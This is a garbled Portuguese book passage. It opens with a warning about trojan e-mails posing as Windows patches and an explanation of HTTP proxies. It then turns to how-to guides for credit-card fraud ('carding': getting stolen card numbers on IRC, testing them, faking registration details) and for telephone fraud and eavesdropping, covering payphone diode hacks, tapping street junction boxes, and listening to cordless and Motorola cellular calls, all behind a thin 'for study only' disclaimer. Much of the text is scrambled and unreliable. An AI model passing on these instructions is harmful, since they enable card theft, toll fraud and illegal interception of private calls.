E-mails RECOMENDANDO INSTALAÇÃO DE "ARQUIVO DE CORREÇÃO" DE SISTEMAS OPERACIONAIS

O e-mail traz a identificação de remetente inexistente. Além dis

Caso você receba um e sas características, não efetue o download do arquivo, pois se trata de "cavalo-de-tróia", programa de computador que, uma vez executado, dentre outros danos à sua máquina, pode capturar seus dados de acesso ao ba

nexados sem verificá-los com antivírus atualizado, mesmo que o conteúdo seja criado pela pessoa de sua confiança qu los-de-tróia, sem que os remetentes sequer saibam disso.

esso ao seu banco via Internet, por exemplo, certifique-se de estar navegando em site seguro, pela exi ia de um pequeno cadeado fechado na parte inferior do programa de navegação. Note também que no início do campo "endereço” surge às letras "https".

Diversos usuários da Internet têm recebido nos últimos dias, uma mensagem que recomenda a instalação de um suposto "pacote de correções" para os sistemas operacionais Windows XP, 2000 e NT.

so, a mensagem que recomenda a imediata instalação da suposta "correção", por meio do download do aplicativo "patch_2002.exe" passa a impressão de ser de autoria da companhia fabricante daqueles sistemas operacionais, o que não é verdade.

-mail com es

nco pela Internet.

Como medida preventiva de segurança é recomendável evitar abrir e-mail de origem desconhecida ou executar programas / abrir arquivos a

e os enviou. Eles podem conter vírus ou cava

No caso específico de ac

stênc

Terrorismo Tecnológico Aprenda Para Sobreviver

98

4.7 Dicas

sem assinaturas eletrônicas para a autenticidade dos e-mails.

Utilize uma criptografia para o caso de alguém roubar informações, assim apesar de telas não conseguirão saber o seu conteúdo.

Extra

U

Troque de senha pelo menos a cada um mês.

Siga as recomendações se mudanças de senhas que estão no capítulo referente a senhas.

(retirado da Internet)

Introdução

Os proxies são principalmente usados para permitir acesso à

Web através de um firewall (fig. 1). Um Proxy é um servidor HTTP especial que tipicamente roda em uma máquina firewall. O Proxy espera por uma requisição de dentro do firewall, a repassa para o servidor remoto d ta e envia de volta

o outro lado do firewall, lê a respos ao cliente.

Terrorismo Tecnológico Aprenda Para Sobreviver

99

Figura 1: Visão geral de um Proxy

O Proxy está rodando ou em um servidor firewall ou qualquer outro servidor interno que tenha acesso total a Internet - ou em

uma máquina dentro do firewall fazendo conexões com o mundo exterior através de SOCKS ou qualquer outro software firewall. Normalm lientes

em uma s aching eficiente de todos os documentos requisitados.

já t

.

ente, o mesmo Proxy é usado por todos os cub-rede. Isto torna possível para ele fazer c

A habilidade que o Proxy tem no uso do cache, o torna atrativo

para aqueles que não estão dentro do firewall. Configurar um ser idor Proxy é fácil e os mais populares programas clientes Web v

em suporte a essa ferramenta. Sendo assim, torna-se simples a tarefa de configurar um grupo de trabalho inteiro para usar o serviço de cache do Proxy. Isto reduz os custos com tráfego de rede porque muitos documentos que são requisitados são lidos do cache local

A metodologia atual é baseada em um código de gateway

escrito por Tim Berners-Lee como parte do libwww (WWW

Terrorismo Tecnológico Aprenda Para Sobreviver

100

commom Library). Kevin Altis, Ari Luotonen e Lou Montulli foram os principais contribuidores para a padronização do Proxy. Lou Montulli, autor de Lynx, fez as primeiras mudanças no libwww em colaboração com Kevin Altis. Ari Luotonen mantém o CERN httpd.

ível de aplicação Proxy faz um firewall seguramente permeável para os usuários na organização sem criar um furo na seg

Porque um nível de aplicação Proxy?

Um n

urança onde hackers poderiam entrar na rede da organização. Para clientes Web, as modificações necessárias para suportar

um nível de aplicação Proxy são menores (leva-se apenas 5 minutos para adicionar suporte Proxy para o Emacs Web Browser).

Não há necessidade de compilar versões especiais de clientes

Web com bibliotecas firewall, o cliente "out-of-the-box" pode ser configurado para ser um cliente Proxy. Em outras palavras, quando se usa Proxy não necessitamos customizar cada cliente para suportar um tipo ou método especial de firewall: o Proxy, em si, é um método padrão para acessar firewalls.

Usuários não têm que ter clientes FTP, Gopher e WAIS

separados (muito menos modificados) para acessar um firewall - um simples cliente Web com um servidor Proxy trata todos esse cas

ra suportar cada protocolo e se concentrem em coisas mais importantes - é po

protocolos são manuseados transparentemente pelo Proxy.

os. O Proxy também padroniza a aparência de clientes Gopher e FTP.

O Proxy permite que os programadores esqueçam as dezenas

de milhares de linhas de código necessárias pa

ssível ter clientes "peso-leve" que somente compreendam HTTP (nenhum suporte nativo aos protocolos FTP, Gopher, etc) - outros

Terrorismo Tecnológico Aprenda Para Sobreviver

101

Usando HTTP entre o cliente e o Proxy, nenhuma funcionalidade é perdida, pois FTP, Gopher e outros protocolos Web são bem ma

a acessar a Internet contanto que o Proxy seja visível tanto para a rede particular como para a Internet.

peados para o HTTP. Clientes sem DNS (Domain Name Service) também podem

usar a Web. O endereço IP do Proxy é a única informação realmente necessária. Organizações usando endereços, por exemplo, classe A (como 10.*.*.*), em suas redes particulares podem aind

Proxy permite um alto nível de log das transações de clientes,

incluindo endereço IP, data e hora, URL, contagem de bytes e código de acesso. Qualquer campo (seja de meta-informação, ou seja, comum) em uma transação HTTP é um candidato para log. Isto não é possível com log no nível IP ou TCP.

Também é possível fazer a filtragem de transações de clientes

no nível do protocolo de aplicação. O Proxy pode controlar o acesso a serviços por métodos individuais, servidores e domínios, etc

mente uma cópia é guardada, como também permite um uso de "cache inteligente", onde os documentos freqüentemente referenciados por muitos clientes são guardados por um pe empo pelo cache manager.

. Outra feature interessante do Proxy é a cache. O uso de cache

é mais efetivo no servidor Proxy do que em cada cliente. Isto salva espaço em disco, desde que so

ríodo mais longo de t

O uso de cache também torna possível acessar algumas

páginas mesmo que servidores estejam fora do ar. Essa facilidade torna o serviço melhor, visto que recursos remotos como um site FTP ocupado que são freqüentemente inacessíveis remotamente podem ser agora acessíveis através do cache local. Pode-se citar uma infinidade de usos que podemos fazer com o cache: fazer uma demonstração de algum lugar com uma baixa velocidade de

Terrorismo Tecnológico Aprenda Para Sobreviver

102

conexão, ler documentos com a máquina não-conectada (ob s documentos no cache local), etc.

para usar ver ões de firewalls em seus códigos. O Proxy é mais simples para configurar do que SOCKS e trabalha em todas as plataformas, não somente UNIX.

Detalhes Técnicos

servidor pega ve" da URL requisitada (Fig. 2); outras partes, como o especificador de protocolo "http:" e o nome do servidor são obviamente claros para o

viamente após colocar todo Em geral, autores de clientes Web não têm razão s

Quando uma requisição HTTP normal é feita por um cliente, o somente o path e a "porção cha

servidor HTTP remoto. O path requisitado especifica um documento ou um script CGI no sistema de arquivos local do servidor; ou ainda algum outro recurso disponível daquele servidor.

Quando um usuário entra:

ils.html

http://mycompany.com/information/ProxyDetails.html O browser converte para: GET /information/ProxyDeta

Terrorismo Tecnológico Aprenda Para Sobreviver

103

Figura 2: Uma transação HTTP normal

O cliente faz a requisição ao servidor HTTP especificando apenas o recurso relativo àquele servidor (nenhum protocolo ou

nome de servidor é colocado na URL). Quando um cliente envia uma mensagem para um servidor

Proxy a situa pre usa HTTP m r

ntretanto, ao o pathname e possíveis palavras que complementariam a procura para o Proxy (como ocorre em uma requisição normal), todo a URL é sp cificada (fig.3 e 4). Desta forma o Proxy tem todas as formações nec a o servidor

remo

ttp://mycompany.com/information/ProxyDetails.html

ção é um pouco diferente. O cliente sempara transações com o Proxy, mesmo quando acessa u

ecurso oferecido por um servidor remoto usando outro protocolo, como Gopher e FTP.

invés de especificar somenteE

ein

eessárias para fazer a requisição par

to especificado na URL. Nada melhor que um exemplo para clarear as coisas: se o

usuário digitasse a seguinte URL: h O browser, sabendo da existência do Proxy, convertería para a

seguinte requisição:

Terrorismo Tecnológico Aprenda Para Sobreviver

104

GET http://mycompany.com/information/ProxyDetails.html O browser conecta-se então ao servidor e o Proxy providencia

a conexão com a Internet. Nesse caso, o Proxy convertería a requisição para:

ET /information/ProxyDetails.html G

Figura 3: Uma transação HTTP com Proxy.

O cliente faz uma requisição ao Proxy usando HTTP mas especificando toda a URL; o Proxy se conecta ao servidor remoto

e pede o recurso relativo àquele servidor sem especificar protocolo ou o nome do servidor na URL

Terrorismo Tecnológico Aprenda Para Sobreviver

105

Figura 4: Transação FTP com Proxy.

O cliente faz a requisição ao Proxy usando HTTP (embora o recurso seja um FTP). O Proxy analisa a URL recebida e percebe que deve abrir uma conexão FTP. O resultado (o arquivo, no caso)

é enviado para o cliente usando HTTP

age como um cliente para conseguir o documento: ele chama o mesmo protocolo libwww que um cliente deveria chamar para que o documento fosse obtido. Entretanto, a "apresentação" do documento no Proxy é através de HTTP, independente do protocolo que foi usado para consegui-lo. Um comando list, por mo um documento HTML.

Deste ponto o Proxy

exemplo, é retornado co

Terrorismo Tecnológico Aprenda Para Sobreviver

106

Capítulo V

Carders e Phreackers-

Use o somente para estudos.

Os textos a seguir foram obtidos pela web. São exclusivamente para entender a facilidade de ser um carder ou um phreacker. Qualquer utilização do material para outro fim que não seja um estudo cientifico não será de responsabilidade do autor. A utilizaçao do material como manual para uso é considerado crime.

Terrorismo Tecnológico Aprenda Para Sobreviver

107

O carder

5.1 Como Funciona:

s cartões de crédito são totalmente verdadeiros. Veja bem. Você ai a um restaurante e paga com seu cartão. Certo ? Bem, logo eus dados são enviados a agenciadora do seu cartão, via modem,

então, mais dificil char os Crakers que pegam os cartões. Uma vez distribuídas no C às informações obtidas sem autorização (invasão) sobre os

artões. são passadas para os Carders, por sistema de troca, a conta Shell (conta especial em Linux ou Unix).

ada usuário carder vai usar o cartão em um ponto diferente do undo.

sabe nenhuma transação é segura na WEB. Quando se z compras on line, as páginas oferecem a opção de compra pelo ECURE SERVER, isto é, eles garantem que transação está sendo ita somente entre a sua máquina e a do servidor, pois todos os

Ovspela aquela maquininha, ou por telefone. Depois que seu cartão fora debitado na agenciadora. ai entram os Carders. Eles invadem o sistema, pegam todos os arquivos de cc (credit card). e distribuem no IRC ( International Relay Chat) para tornar,aIRcgeralmente umCm

5.2 Obtenção de cartões. Como você faSfedados estão sendo codificados. Isso não garante nada!.

Terrorismo Tecnológico Aprenda Para Sobreviver

108

Mesmo que nenhum hacker consiga decodificá-la, isso não impede vidor da página e consiga o arquivo que

ontenha os dados dos clientes.

simples: no IRC, existem canais específicos, são os canais ackers, é só fazer amizade e pedir o número de um cartão.

xistem canais no IRC específicos falando sobre carders, #carders -

ndo russos, americanos, brasileiros, e tudo mais : ) visite: ttp://www.klan.carder.com

que se entre no serc A outra opção menos trabalhosa, é simplesmente PEDIR!!! Éh

E#cc - #carding - #mastercard - #passw. A EFNET é mais visada,teh . #carder Brasnet - #cader Efenet -

carder Brasirc

rdear!

Antes de tudo páginas de ompras, ou na maioria delas, paginas de registro de shareware que ocê deve preencher o cadastro* como se fosse registrar um soft eu e nisso ela dirá se o cartão é válido ou não.

Cadastro.

#

5.3 Como Ca

você deve testar os cartões. Existemcvs *O

Terrorismo Tecnológico Aprenda Para Sobreviver

109

Quando você for se cadastrar, você deve preencher todos os

erdadeira é o e-mail* pra contato.

E-mail.

bém não deve ser o do seu do provedor, você deve sar o e-mail de páginas que fornecem o e-mail gratuito tipo:

astreamento de IP.

uando você prenche os dados em páginas de cadastrador, seu ndereço IP é rastreado pela página, ou seja, eles podem te calizar pelo seu provedor de acesso mas pode ser usado técnicas e anonimidade.

que geralmente é cardeado.

odem ser usadas de diversas maneiras:

campos com informações falsas, ou seja, o endereço..tel..etc, pois você não quer ver o sol nascer quadrado né??. A única informação que deve ser v *O O e-mail tamuHotmail , Starmedia etc. R Qelod

O Suas habilidades carders p

Terrorismo Tecnológico Aprenda Para Sobreviver

110

Você pode fazer inscrição em home pages que dão acesso

a maioria páginas pornos, onde o acesso permitido com o pagamento mediante cartão de

m ser

rdear algo concreto

e

Você tem que estar certo que o cartão é válido!!!!!

2- Use de preferência cartão estra o, evite cartões brasileiros. (3- Se você for cardear alguma coisa cara, use cartões American Express e Visa Go há perigo de não

r crédito :-)

ne revistas nacionais, cardeie as ericanas, levam +ou- uns 20 dias para chegar. Uma dica port

eios, para receber

sas revistas ( custa R$ 54,18 por 1 ano).

exclusivo para usuários, nao conteúdo só éCrédito. LEMBRE-SE: As informações do cadastro devefalsificadas, menos o cartão, é claro.

5.4 Como ca Sem dúvida a glória de um Carder é cardear alguma coisa, dpreferência um computador para conseguir tais proezas énecessário: 1-

ngeir

ld, pois o limite e grande e não te 4- Não cometa o erro de cardear alguma coisa cara parcelado, ou seja, compre tudo à vista!!! 5- Se você for cardear assinaturas de revistas (registramos casos esse tipo também), não assid

amIm ante:

Se você puder alugue uma caixa postal nos corres

Terrorismo Tecnológico Aprenda Para Sobreviver

111

Pronto você já pode se divertir como um CARDER !!!!!!!

5.5 Phreacker (Telefonia) Indice

A1. Introdução A1.1. Prefacio da vA1.2. Pobreza de informações e pessoas mal informadas A2. Telefones privad

2.1. Introdução

o um diodo 3.3. Efetuando ligações gratuitamente utilizando um aparelho m

3.

ersão

os AA2.2. Efetuando ligações de aparelhos sem teclas A3. Telefones públicos A3.1. Introdução

3.2. Efetuando ligações gratuitamente utilizandAAco um

4. Conectando notebooks a telefones públicos AA3.5. Observação A4. Caixas de verificação A4.1. Introdução A4.2. Efetuando ligações gratuitas de caixas de verificação A5. FAQ A5.1. E possível tomar um choque mexendo em fios telefônicos? A5.2. Como faço para fazer chamadas grátis de minha residência? A6. Observação final

Terrorismo Tecnológico Aprenda Para Sobreviver

112

A1. Introdução

A1.1. Prefacio da versão

Depois da primeira versão deste manual recebi dezenas de mensagens, principalmente do pessoal do BHC (Brazilian Hackers Club), com varias perguntas. Algumas se tornaram adendos e complemento para as seções e outras eu levei para uma Mini-FAQ, que esta localizada na seção 5.

A1.2. Pobreza de informações e pessoas mal informadas

Ao me deparar com alguns textos do gênero, senti-me decepcionado ao perce tos e fracos, quando o

sunto em questão er ambém perceber que

inado ueles que se rasgam de ler textos americanos de phreaking e

tnão permite o "boxing". Maiore s na seção 5.

ber que eram incomplea a telefonia. E triste tas

pessoas mal informadas e sem conhecimento técnico (embora tenham boa vontade), assinam estes textos. Faço aqui um tutorial com material bastante útil, que explica muitas coisas que podem ser feitas com a intenção de buscar um pouco de liberdade para se utilizar os sistemas telefônicos. Este texto também e destaqboxing. Não importa o que o fulano ouviu dizer que dava, o sistema elefônico nacional e completamente diferente do usado nos EUA, e

s detalhe

Terrorismo Tecnológico Aprenda Para Sobreviver

113

A2. Telefones privados

A2.1. Introdução Nesta seção, explicarei o processo (bem simples) de se efetuar ligações a partir de telefones sem teclas ou com cadeado, muito omuns em empresas e ambientes de trabalho. c

A2.2. Efetuando ligações de aparelhos sem teclas

tes de começarmos, precisamos definir o que significa "duração esmente uma interrupção no fluxo a telefônica, e a sua duração e

endida como o espaço de tempo decorrido do inicio ao fim desta sos enviados pelo aparelho telefônico quando de algum número, são iguais ao sinal emitido

ncho. A diferenciação e feita ia a duração do pulso.

maior do que 0.5 segundos (aumentar um a as linhas mais antigas), a central considera

edido de linha. Se a duração do pulso for menor do que

úmeros de 0 a 9, e enviada uma s pulsos em seqüência referentes ao número, ou para o número 2, três para o número 3 e assim por

nte. Para o número zero são enviados dez pulsos. Para simular es pulsos sem a necessidade de teclas, basta usar o botão onde

"pega" a linha, aquele onde você coloca o telefone em cima

Ande um pulso". Um pulso e simpl

corrente que circula na linhdeentinterrupção. Os pul

botãovocê aperta oquando você coloca o telefone no ga

central telefônica, usando como referencpela Se ele for um pouco

e valor parpouco esse e um pqu

esse valor, a central ira considerar que o número a ser discado esta ndo enviado. Para formar os nse

série de pequenoja, dois pulsos se

diasse

sequando quer terminar uma ligação. Aperte e solte este botão rapidamente de acordo com o número que você quer discar, espere um pouco e aperte outra série de vezes de acordo com o outro número. Lembre-se que para o número zero deve-se apertar o botão dez vezes. Faça isso com todos os números e, ao final, você escutara o tom de chamada.

Terrorismo Tecnológico Aprenda Para Sobreviver

114

A3. Telefones publicos

A3.1. Introdução Nesta seção explicaremos alguns métodos que hackers usam para efetuar ligações com telefones públicos sem a necessidade de se gastar fichas. Mostraremos também como ligar notebooks a telefones públicos (se e que existe um hacker que não saiba). A3.2. Efetuando ligações gratuitamente utilizando um

diodo O diodo e um componente eletrônico que possui diversas utilizações. Podemos resumir seu funcionamento basicamente na seguinte síntese: Um diodo (ou junção PN) permite que a corrente circule em apenas uma direção dentro de um circuito. Ao se utilizá-lo para o fim aqui desejado, vamos precisar de um diodo IN4002, IN4004 ou IN4007. Estes podem ser encontrados facilmente em qualquer casa de componentes eletrônicos. Vamos precisar também de um resistor com valor nominal de 22K e potencia de 1W. Basta

e você ligue o diodo em paralelo com o resistor (confqu orme tenta ostrar a ilustração abaixo) e, em seguida, descasque os fios do lefone e ligue cada uma das pontas obtidas com o diodo e o

o

| / diodo \ |

mteresistor neles. Lembre-se: você vai apenas descascar os fios do relhão! Se você cortá-los, ele vai ficar sem linha.

| | | | | | | | +------------------++------------------+ | | | | +----¦ ¦ ¦ ¦ ¦ ¦ ¦----+ | |

">

Terrorismo Tecnológico Aprenda Para Sobreviver

115

ponta +_-----------+ +-----------_+ ponta | \ / | | +--

esistor |

eira errada, o orelhão vai ficar sem linha. Uma dica ssoal: os telefones de cabine e os de cartão são mais fáceis de rem violados. Alguns orelhões comuns tem uma proteção

lindada que impede o nico. Embora mesmo sim seja possível puxar o fio com

onar. Mesmo se você não achar nenhuma

---¦ ¦ ¦ ¦ ¦ ¦ ¦-----+ | | r| | +------------------++------------------+ | | | | fio do telefone | | | | Para executar esta tarefa, eu aconselho que você descasque os fios dos orelhões que você utiliza com mais freqüência, pois, devido ao fato dos fios do telefone publico serem muito grossos, não e um trabalho que se possa fazer tranqüilamente e rapidamente sem ser notado. Você devera observar também a polarização correta a ser utilizada. Você percebera isso facilmente, pois, quando você ligar o

odo de mandipeseb acesso ao cabo telefô

um gancho, que você enfiara do aslado esquerdo do aparelho telefônico, entre o telefone e uma grade preta de sustentação que fica atrás dele, eu aconselho que você evite esses tipos. Vamos voltar um pouco para a parte técnica da coisa. O diodo que estamos utilizando vai funcionar da seguinte maneira: Quando uma ligação e completada de um telefone publico, a central inverte a polarização do telefone de -48 para 48 volts. Quando o aparelho telefônico percebe isso, ele pede uma fixa. E ai que entra em funcionamento o nosso querido diodo. Ele permite que a tensão caia ate 0 volts, mas não permite que ela se torne positiva. Dessa forma, o orelhão não vai pedir a ficha. Nesse caso o resistor esta funcionando apenas como um dissipador de potencia, para que você não de o azar de queimar o diodo (não que ele seja caro, e que em algumas localidades ele pode ser uma peça rara que custa

$0,10) e ficar sem telefR

Terrorismo Tecnológico Aprenda Para Sobreviver

116

loja que venda, pegue uma placa de algum circuito eletrônico antigo alguma coisa que tenha queimado. Elas sempre tem diodos.

Você deve procura m dois terminais, e preta e normalmente estará escrito IN qualquer coisa.

lefones públicos

processo para se conectar notebooks a orelhões e igual ao de se cone as considerações a respeito notebook, que segue os

drões da FCC Americana e é um pouco diferente da nossa. O

esta tudo OK.

der uma peça pequenininha que te

A3.3. Efetuando ligações gratuitamente utilizando um

aparelho comum Primeiro você deve tomar os processos citados anteriormente para descascar os fios do telefone. Em seguida você deve conseguir um aparelho telefônico comum e ligar cada uma das pontas dos fios dele nos fios do orelhão. Para facilitar sua vida, eu aconselho que o seu telefone seja o menor possível e que você prenda um jacaré (pequeno gancho achado em qualquer loja de componentes eletrônicos) em cada uma das pontas do seu telefone, para facilitar a ligação no orelhão. Ai e só efetuar a ligação normalmente.

A3.4. Conectando notebooks a te

O

ctar telefones comuns. Resumirei nesse item algumda fiação do

paconector do fio do notebook, que e do tipo Jack, tem quatro fios dentro dele. Arranque o conector de plástico transparente que fica na ponta do fio, pegue os dois fios centrais e separe-os dos fios das extremidades. Estes dois fios centrais são os que serão utilizados para fazer a ligação no orelhão. Eu aconselho que você coloque jacarés neles também. Basta conectar-se a BBS's da mesma forma que você se conecta em casa. Caso você queira testar se esta tudo OK, abra um programa de terminal qualquer e digite o comando ATA, se fizer um barulhinho parecido com o tom de linha e porque

Terrorismo Tecnológico Aprenda Para Sobreviver

117

A3.5. Observação

As chamadas telefônicas se dividem em três categorias: locais, DDD regionais e interurbanas (ou nac nais). As chamadas locais são aq ligações feitas dentro do co onde você mora, no caso

São Paulo, as chamada las feitas para

A4. Caixas de verificação

A4.1. Introdução

ão em forma de triangulo, que alquer chaveiro conhecido pode fazer. Lembre-se que um

, não é um vândalo. Não vá arrombar a porra da caixa.

iouelas efetuadas dentro de sua cidade, as DDD regionais são as

mplexo urbano s DDD regionais são aquede

as cidades que fazem parte da Grande São Paulo: Jundiaí, Santo André, São Bernardo, etc. As chamadas interurbanas são aquelas feitas para fora do complexo urbano onde você esta localizado. Usando São Paulo como exemplo, podemos citar o interior do estado de São Paulo e cidades localizadas em outros estados. Os telefones comuns efetuam chamadas locais e DDD regionais, e os telefones DDD efetuam chamadas interurbanas, ou seja, para qualquer lugar do Brasil.

As caixas de verificação (ou armários na linguagem "técnica" da TELESP) são caixas de ferro, que geralmente ficam localizadas em vias publicas, e são utilizadas para se fazer a checagem das linhas do sistema e identificar problemas antes de se enfiar no subsolo para tentar resolvê-los. Tais caixas costumam ser da cor cinza e tem cerca de 1,5 m de altura, com um código em preto escrito na parte superior. Elas possuem um grande número de fios telefônicos, todos eles divididos em pares. Tais caixas podem ser facilmente abertas (se e que a que você achar já não estiver arrombada), pois

ralmente possuem uma tranca padrgequphreacker

Terrorismo Tecnológico Aprenda Para Sobreviver

118

Isto e coisa pra quem não tem cérebro. Mesmo se ela estiver ncada com um cadeado, se não puder abrir um cadeado ou

ocurar informação de um método para abri-lo, procure outra caixa. Ou então esqueça qu

de caixas de verificação

ara se efetuar uma ligação de dentro destas caixas, basta que cê pegue um dos diversos pares de fios que se encontram lá ntro e ligue eles ao seu pequeno telefone comum portátil ou a um tebook. Não esqueça de por os fios que você tirou de volta no

gar para que nem o pessoal da manutenção e nem o dono da nha percebam. Como essas caixas de verificação costumam se

situar em vias bem tipo de ligação e saconselhada. Mas, como toda a regra tem sua exceção, fica aqui

ais uma informação para você. Vale lembrar que de caixas de rificação pode-se efetuar telefonemas para qualquer lugar,

clusive chamadas internacionais.

xendo em fios

ssuem uma tensão ficiente para dar choque relativamente forte em uma pessoa. Este lor de tensão pode atingir um patamar em que ele pode dar um rdadeiro coice na pessoa, no momento em que a linha envia o

p

tom que legal. Se você estiver

trapr

e você leu esta seção.

A4.2. Efetuando ligações gratuitas

Pvodenoluli

movimentadas, a pratica desse demvein

A5. FAQ

A5.1. E possível tomar um choque metelefônicos?

omo descrito no item 1.3, os fios telefônicos poC

suvavesinal para o telefone tocar. Isto depende muito da situação e da

essoa. Se você estiver com a mão no orelhão e mexer nos fios,ar um chovocê provavelmente vai

Terrorismo Tecnológico Aprenda Para Sobreviver

119

acabado de comer algo salgado, provavelmente este choque será ainda mais forte, pois o sal aumenta a condutividade do seu corpo. A5.2. Como faço para fazer chamadas grátis de minha

residência? Quando você efetua uma chamada, a central telefônica identifica de onde você esta discando, identifica qual o tipo de telefone que você esta usando (publico ou residencial), e então ela arquiva pra onde esta sendo feita a ligação e toma as providencias necessárias com

lação à cobrança. Essa identificação e feita na fonte e não por um nal enviado pelo seu telefone. Desse modo, e praticamente possível pra você que esta na sua residência, tentar driblar essa

tari al PABX.

resiim

farão. Imagine que sua linha telefônica não passa de um ramde

A6. Observação Final Todo o processo aqui descrito não causa nenhum tipo de dano aos aparelhos telefônicos, mesmo em longo prazo.

5.6 Telefones Particulares

Terrorismo Tecnológico Aprenda Para Sobreviver

120

diceÍn

r para o Disk-Amizade sem pagar 4. Ligando a cobrar mais barato 5. Escutando conversas telefônicas através de telefone sem fio 6. Efetuando ligações de telefones sem teclas

ar, entenda que isso e apenas o seu entretenimento. cas

a ligação dentro da sua casa. Os lefones em questão são telefones sem fio. Eles transmitem suas das por FM. Sendo assim, o que você tem que fazer e descobrir a qüência. Porém, ha suas restrições. A menos que seja um radio

com do lefone. Uma freqüência que descobri e 93,9 MHz, mas não quer

B1. Como escutar ligações com um aparelho de radio comum B2. Fraudando orelhões com um aparelho comum B3. Como ligaBBB

B1. Como escutar ligações com um aparelho de radio

comum Para começPor isso, não daremos dicas de como escutar ligações telefônido seu vizinho. Se o que você quer e isso, nem comece a ler. O que será ensinado e escutar umteonfre

uma antena muito forte, ele tem que ficar perto da basetedizer que todas sejam assim. E não e apenas ligar o radio e escutar. Leva-se um tempinho para poder sintonizar. Mas depois de sintonizada no ponto exato, você poderá escutar perfeitamente.

B2. Fraudando orelhões com um aparelho comum Modo de fraude com telefone comum a orelhões públicos: Primeiro você deve arrumar um telefone comum bem pequeno e compacto.

Terrorismo Tecnológico Aprenda Para Sobreviver

121

Depois você tem que descascar os fios dele (vão dar em 2 fios). Então arrume um bom alicate, estilete ou faca e vá ate um orelhão. Descasque os fios do orelhão (descasque, não e para cortar) pegue os dois fios descascados do orelhão e entrelace com os dois fios do seu telefone, observe a polarização, ou seja, se seu telefone portátil

ar sem linha inverta a posição dos fios telefônicos, pois, ao

B4. rato

ara ligar a cobrar mais barato, você tem que adicionar um número e a soma dele com o ultimo seja igual a 10. Ex: A soma desses meros tem que dar 10. Como fazer: 9 011 5584-0352 + 8 = 9 011 84-03528.

ravés de

que isso aconteça, você tem que tirar o ansformador" (não sei se e esse o nome), e um retângulo que rmalmente e preto, igual ao de um vídeo game. passo - Ligar o telefone! Ele tem que ficar fazendo uns barulhos tranhos!

ficcontrario do que muita gente pensa, o orelhão tem fio negativo e positivo. Agora e só efetuar a ligação de seu telefone comum.

B3. Como ligar para o Disk-Amizade sem pagar Pessoas de São Paulo tem acesso ao Disk-Amizade, o único problema e que e pago, para ligar de graça apenas disque um 5 a mais, que ficara 1455, desse modo sua ligação não cairá na lista telefônica.

Ligando a cobrar mais ba Pqunú55

B5. Escutando conversas telefônicas atlefone sem fio te

° passo - Para 1

"trno2ºes

Terrorismo Tecnológico Aprenda Para Sobreviver

122

3º passo - Pegar ele r de sua casa. : Isso só funciona algumas vezes! Lembre-se que não sou

ntes de começarmos, precisamos definir o que significa "duração um pulso". Um pulso e simplesmente uma interrupção no fluxo corrente que circula na linha telefônica, e a sua duração e

entendida com ao fim desta terrupção.

e 0.5 segundos (aumentar um pouco esse lor para as linhas mais antigas), a central considera que e um dido de linha. Se a duração do pulso for menor do que esse valor,

a ce ndo viado.

e apidamente de acordo com o número que você quer discar,

pere um pouco e aperte outra série de vezes de acordo com o número zero deve-se apertar o

e, ao final, você escutara o tom de chamada.

e sintonizá-lo no melhor lugapsresponsável pelos seus atos!

B6. Efetuando ligações de telefones sem teclas Adede

o o espaço de tempo decorrido do inicioin Os pulsos enviados pelo aparelho telefônico quando você aperta o botão de algum número, são iguais ao sinal emitido quando você coloca o telefone no gancho. A diferenciação e feita pela central telefônica, usando como referencia a duração do pulso. Se ele for um pouco maior do quvape

ntral ira considerar que um número a ser discado esta seen Para formar os números de 0 a 9, são enviados uma série de pequenos pulsos em seqüência referentes ao número, ou seja, dois pulsos para o número 2, três para o número 3 e assim por diante. Para o número zero são enviados dez pulsos. Para simular esses pulsos sem a necessidade de teclas, basta usar o botão onde se "pega" a linha, aquele onde você coloca o telefone

cima quando quer terminar uma ligação. Aperte e solte estembotão resoutro número. Lembre-se que para o botão dez vezes. Faça isso com todos os números

Terrorismo Tecnológico Aprenda Para Sobreviver

123

5.7 Telefones Celulares

Índice C1. Burlando celulares C2. Ouvindo escuta de celulares C3. Fazendo escutas com o PT 550 da Motorola C4. Escuta celular via TV C5. Escuta celular

C1. Burlando celulares Primeiro, pegue o número que você vai discar. Ex: 123-4567. Esse número e fictício, não saia ligando para lá para pedir informações. Então devemos pegar o ultimo número do telefone a ser discado, no caso o 7... Então subtraímo-lo de 10, o que vai resultar o número 3. Somente vamos acrescentar o número 3 ao final do número discado. O resultado vai ficar: número ligado sem pagar: 123-4567-3

C2. Ouvindo escuta de celulares

rimeiro retire a bateria do seu celular; depois de abrir o celular, Pterão umas partes de metal embaixo dele, como três riscos de metal ||| , pegue um pedaço de papel alumínio e bote nos riscos de metal, depois bote a bateria e ligue o celular, irão acontecer algumas coisas, digite #1008# e depois de digitar o número e só ouvir as conversas telefônicas.

Terrorismo Tecnológico Aprenda Para Sobreviver

124

C3. Fazendo escutas com o PT 550 da Motorola O sistema de telefonia celular e altamente vulnerável ao phreaking. E simples fazer escutas telefônicas e outras coisas, como clonagem de telefones para se efetuar ligações gratuitas, etc. Se você dúvida, pegue um celular como o famoso e númeroso PT-550 da Motorola. Tire a bateria do celular e note que ha três encaixes metálicos atrás do aparelho. Coloque um pedaço de papel laminado no encaixe do meio e recoloque a bateria. Ligue o telefone (ele esta agora no modo de programação) e digite: # 08 # 11 XXXX # Onde:

8 - Liga o áudio de RX (Receptor) #11 - Ajusta canal de funcionamento do transceptor

XXX - número do canal (aconselho a você tentar números abaixo

#0

Xde 800) Exemplo: #08#11567# Tente varias vezes ate encontrar um canal onde haja conversa. Percebeu? Você esta fazendo uma escuta em um telefone celular. Não requer pratica nem tão pouco habilidade. Vale lembrar que se algum policial te pegar, você pode ir a cana. Ha também maneiras de se fazer clonagem, isto e, fazer o seu telefone celular usar a linha de outra pessoa. Eu particularmente nunca tentei, mas se você quiser por sua pele a risco, procure pelo Motorola Bebe, ou outros tantos textos existentes por ai. Falando de maneira simples, um celular e um radio-transmissor que trabalha com freqüências na faixa de 800 MHz, e que e capaz de alternar entre canais ao receber comandos de um computador conhecido como Central Switch, que controla o sistema telefônico móvel. Pode-se dizer que um aparelho celular e dividido em duas partes: O Transceiver (Transmissor/Receptor) e a cabeça de comando. Entende-se por cabeça de comando o teclado e seu circuitos de comandos, a NAM e a ESN. A NAM e um chip de PROM (Programable Read Only

Terrorismo Tecnológico Aprenda Para Sobreviver

125

Memory) que contem informações sobre o funcionamento do celular, como número, área, etc. Já a ESN (Eletronic Serial Number) e um chip de ROM (Read Only Memory) que armazena um número, geralmente de 11 dígitos octais, referentes a um número de série único para cada telefone. Existem alguns modelos de celulares que tem as suas NAMs reprogramaveis pelo próprio teclado do celular. Outros necessitam que se ligue o celular a computadores.

C4. Escuta celular via TV

